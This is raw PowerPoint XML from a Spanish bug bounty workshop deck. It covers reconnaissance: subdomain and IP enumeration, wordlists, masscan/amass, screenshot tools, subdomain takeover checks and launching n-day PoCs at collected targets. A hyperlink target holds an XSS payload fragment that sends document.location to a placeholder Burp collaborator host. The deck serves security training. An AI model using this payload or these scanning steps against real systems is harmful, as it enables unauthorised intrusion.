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9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71" r:id="rId14"/>
    <p:sldId id="276" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="265" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="277" r:id="rId20"/>
    <p:sldId id="278" r:id="rId21"/>
    <p:sldId id="270" r:id="rId22"/>
    <p:sldId id="279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3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C592A-BAA7-45C7-9ECF-0C7CFC0E3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649283-33FB-4BA5-A704-F3972E3F4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97E5F-D719-4DB0-B231-0F72B196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3889BC-5308-48F4-8C28-9087FA49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5AC4B-04C3-4E4E-8E91-71701A4C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885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082F9-80D2-465B-87AF-34EE72CB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D89C0C-66C7-4818-9880-B301AD349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39AE24-891E-4D21-A5E2-CEFC083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CA3F4-23CC-4F57-8C1A-80FDFE94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E273E4-BA51-4235-8AE5-E1B10696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00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D20DE1-B6E5-46AC-9E48-8FBC2C58C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2FBA57-16BE-481A-B2D8-09ABA3B26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69C52E-CD92-4183-AC23-D6179857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65ED77-AA89-44FE-9BB6-FB5A5777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028F0-5CEF-4830-A2FF-3BEB843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04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83233-C13E-437C-B7CA-2D4FE0E7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B19BC-1DE8-4433-A8D0-139B0992D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9956D1-558F-4225-A1C5-DB9A604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A964E-9305-4622-9789-CD8234F5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61C43-86D5-4D3B-8193-B9A9A535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1C82F-400B-46C8-B5F0-50764EBC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CDE20C-980B-4984-968A-E0C88338E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F68AB5-BA36-4329-8E94-CDCD3615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1AEEC9-C276-432F-8102-4B71E062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BF9433-D529-462D-A5CE-F5143F93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29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DD9A-D561-41A6-AB89-6458BEC8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DAB62-724D-4005-A08C-C7D27C03B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F6C789-C02A-46AA-8507-2BCBC3DFE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60170D-8826-4F5C-A22E-5EFE4BEE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C368AA-09B3-4FCA-B822-1222660F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F92F0-E27C-466F-A758-9CF2A632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4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CA785-F035-4C7A-9025-403C75FE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BA1023-01D1-43E2-8682-08A0649E2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B7801B-DDAE-4E1C-9CBA-A5A7BB71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35960A-980A-4C5F-A9E7-42D936EA7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C230BD-3C3D-40CC-B4DC-4EEDEC915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EDD0C7-DCFD-4816-B5E7-7C247B36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D849C1-D798-4012-9D16-917FC020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24126B-F356-413B-B4CF-52917E15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58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1BD6-49AA-4713-9FEB-70FB5D9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172472-7E9D-478F-AC65-41277680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B7FBB-C414-45F8-B4DD-A4759FCD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C05F55-E555-4D7C-B71B-86FFC866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8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A787DA-4B0E-4415-B69E-E97D32E7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7EA112-8BB4-4321-A20F-ECBA94C4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E41B0F-41A1-408A-8096-B75F22E4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1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CDD6-C938-4E79-BA5D-1A59478F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BFBFB-FD7E-474D-88E5-29669029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4F094-FF7D-4963-962A-D2BC3C51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360F92-A126-42AE-8E49-4DF740CA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6FE5F7-EF39-4DFD-9180-9779766E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8B5313-6919-455E-B559-4D6A6062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60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604FF-4C35-46C3-B5F0-29502156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CD9F7A-DAC3-492D-9906-196FD4513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99730F-CC44-4588-B9EA-F76D8DDBD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4AC075-A689-4F72-8CD8-BC3063AF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08EE33-47B3-43AE-9B46-DED43A9A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08D92B-1F38-4724-9AC8-C0B9E7BD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09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9EE5FC-5E4E-426C-A83D-D626FFBE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54CA84-8BDB-4E9D-8033-6587D70C5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F65E62-E749-4DDC-818D-6F571CEF9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6D5F9-F801-4FD4-AF4C-852568F1B105}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>30/01/2021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62E40C-048D-4F77-AC87-01D1D12DF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7A81CE-F366-4CA3-ADDE-72D55CE20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6D7C0-EE8B-431B-BD49-E36458C1B2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00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www.reversewhois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nomnom/httprobe" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectdiscovery/http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miessler/SecList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our.burpcollaborator.net/?document.location;%3c/script%3e" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://your.burpcollaborator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evanshbatham/ParamSpid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k0d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21FBC3C-DFFD-4D30-8841-05F3B88E9822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2418824" y="570364"/>
            <a:ext cx="7201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TALLER DE BUG BOUNTY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03D351-2EE2-4D4F-83E6-12B85EA1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4" y="2265331"/>
            <a:ext cx="7354352" cy="34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6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296C4DE-2536-4150-A4A6-D7DCF399F2F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793698" y="446076"/>
            <a:ext cx="7696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TOOLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ACTIVAS Y PASIVAS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261668-8D8C-47F6-8595-28E37964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67" y="1570608"/>
            <a:ext cx="6404499" cy="50944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EDEFC0-D1C7-4832-B795-F157B32E1B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895425" y="2640524"/>
            <a:ext cx="2752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Usar el spider de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>BurpSuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, sobre todo en aquellas webs pensadas para que el usuario interactúe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326159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296C4DE-2536-4150-A4A6-D7DCF399F2F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1793698" y="446076"/>
            <a:ext cx="7696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TOOLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ACTIVAS Y PASIVAS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8EC6C7-D18F-4DEB-AC3D-389B545CAD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2416040" y="1589103"/>
            <a:ext cx="64518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-https://www.crunchbase.com/search/acquisitions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-Reverse WHOIS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.reversewhois.io/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-viewdns.info para hacer muchos tipos de consultas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-https://dnsdumpster.com/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>https://github.com/vysecurity/DomLink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final_6013eaa2b801610063c5d07f_978526">
            <a:hlinkClick r:id="" action="ppaction://media"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2DACCE4-A33E-4714-B8D0-6EE960BED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7633" y="4297284"/>
            <a:ext cx="4676733" cy="25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658E1CE-004F-4976-8CDA-E71610392DEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040078" y="623631"/>
            <a:ext cx="7756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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lidiando con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="1" dirty="0" err="1">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="1" dirty="0">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t> difíciles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EAAD45-169E-4D2A-AB99-0596B6456434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3009530" y="1864310"/>
            <a:ext cx="6560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dirty="0"/>
              <a:t>Sin opción de output: output -&gt; Redireccionar, o | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>xclip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>clipboard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y luego copiar a fichero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En formato CSV (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>tool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> anterior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Output caótico -&gt; subdomainextractor.py</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Output repetido -&gt; | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>sort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> –u</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR" startAt="4"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenR" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Cut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, Sed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Awk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DE2700-0E23-48F2-BF70-2182CBEE0497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7403976" y="4131685"/>
            <a:ext cx="433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Ver webs que no estén en inglés (suele haber menos gente mirando)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16106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192C2ED-07B2-420C-9ADC-A94CDE3F4CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3055472" y="366177"/>
            <a:ext cx="5228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¿ESTÁN ACTIVAS?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2C208B-30B5-4530-8317-F23811DC052B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2006353" y="1562470"/>
            <a:ext cx="91795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https://github.com/projectdiscovery/httpx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>  (sirve también como alternativa a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>whatweb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> con su opción –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>title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>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/tomnomnom/httprobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (redirigir output a archivo para las fases de escáneres automáticos e identificación visual)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47254F-9CBE-45CC-B2A5-0920B6F34935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2379217" y="3346882"/>
            <a:ext cx="75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aunque no estén activas, es buena idea usar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>SubOver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subtocheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> para ver si podemos hacer un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>subdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>takeover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60549A-9C8F-4AEB-9DA6-10A7428D4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68" y="4206705"/>
            <a:ext cx="6299863" cy="247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30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896A2C3-01EE-4DFE-8AD6-8FDC21581C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4188295" y="561487"/>
            <a:ext cx="2892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err="1">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Wordlists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97F1CB-0D58-41DC-8896-59BC5885AEBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1660124" y="1944210"/>
            <a:ext cx="94991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https://github.com/danielmiessler/SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> &lt;--Discovery/DNS para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>knockpy</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>En Kali /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y Discovery/Web-Content en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>wfuzz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/>
              <a:t>Para un tema concreto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>find</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>opt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>SecLists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> “*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>*” o en Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>git</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Creación de diccionarios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> -&gt; si necesitan de un formato concreto usar Crunch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Diccionarios </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>custom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> para web-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>CeWL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y añadir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>paths</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> comunes que te vayas encontrando en un programa de Bug </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Bounty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917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7B1422-F13D-4ECF-B303-3BD7AF20BD07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364177" y="396733"/>
            <a:ext cx="7108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IDENTIFICACIÓN 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86EF2B-1B8C-4056-ADD3-F92FCE8D7BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867487" y="1850016"/>
            <a:ext cx="6303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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>EyeWitness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (algo antiguo)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Aquatone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-Otros scripts propios basados en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Selenium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05378B-17BA-4769-8CE9-C875D6FC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929" y="3530657"/>
            <a:ext cx="6182142" cy="27916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B5ECA4-5998-469E-B8EE-58AC4544B962}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9099612" y="1523377"/>
            <a:ext cx="2902998" cy="1803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Buscamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>logins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>, imágenes típicas de CMS, webs con botones (parece tonto, pero las webs con interacción con los usuarios suelen ser más vulnerables) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39870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7EB0389-1E71-42CE-A280-ED7970395762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505434" y="144236"/>
            <a:ext cx="4932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Enumeración </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="5400" b="1" cap="none" spc="0" dirty="0" err="1">
                <a:ln/>
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>IPs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702FFB-55FD-4247-95EB-4ED5AD49CB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876365" y="1603327"/>
            <a:ext cx="6773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-http://asnlookup.com/ -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> y a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>masscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (y a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>amass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> para ver el nombre del ASN y comprobarlo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-http://ipv4info.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>-https://www.shodan.io/search?query=org%3A%22Tesla%22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amass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>intel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>orgname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>” -&gt; devuelve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>ASNs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> que podemos escanear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Masscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> (--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> opciones compatibles con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Nmap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53AC4A-914C-47AB-BCF1-D0EABA2752D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2521258" y="4685216"/>
            <a:ext cx="761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n-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>days</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>. En cuanto sale una vulnerabilidad que no ha sido parcheada, pero tiene PoC y/o escáner, lanzar a los dominios y/o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Ips</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> que tengamos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3545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9EFF73-B4B1-4BD3-BDF8-0C72DB6BA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1864310" y="1443841"/>
            <a:ext cx="7652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Fallo SSRF:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> recon.txt| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>httpx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
